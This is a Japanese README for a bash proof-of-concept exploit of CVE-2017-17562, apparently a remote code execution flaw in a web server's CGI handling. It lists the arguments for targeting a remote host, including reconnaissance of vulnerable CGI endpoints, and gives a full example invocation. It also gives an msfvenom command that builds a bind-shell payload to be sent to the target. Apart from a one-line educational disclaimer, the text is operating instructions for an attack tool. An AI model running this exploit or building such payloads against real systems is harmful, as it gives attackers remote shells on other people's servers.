
CVE-2017-17562のPoC、bashで記述
Bash による CVE-2017-17562 のPoC実装です。
HTTPリクエストの作成には curl が必要です。
Metasploit および @fssecur3 の実装に基づいています。
以下の引数は、偵察とペイロード送信に必要となるため、設定する必要があります:
$1: IP/Host of remote vulnerable machine being attacked
$2: Port of remote machine webserver
$4: Path to crafted payload being sent to vulnerable machine
オプションとして、以下の引数も設定できます:
$3: If the web server is running under a TLS/SSL tunnel. Defaults to no
$5: Path to list of known vulnerable CGI endpoints, to be used in reconnaissance phase. Defaults to "cgi.endpoints"
bash exploit.bash 192.168.1.1 80 yes payload.so cgi.endpoints
本コードは学習およびデモンストレーション目的のみです。許可なくターゲットに対して使用しないでください。
このリポジトリにはペイロードは提供されていません。ただし、ターゲットOSのアーキテクチャに一致する任意のバイナリが動作するはずです。バインドシェルペイロードを作成するには、msfvenon を使用できます:
msfvenom -a <instruction_set> --platform <os> -p generic/shell_bind_tcp LHOST=<attacker_ip_address> LPORT=<target_bind_port> -f elf-so -o payload.so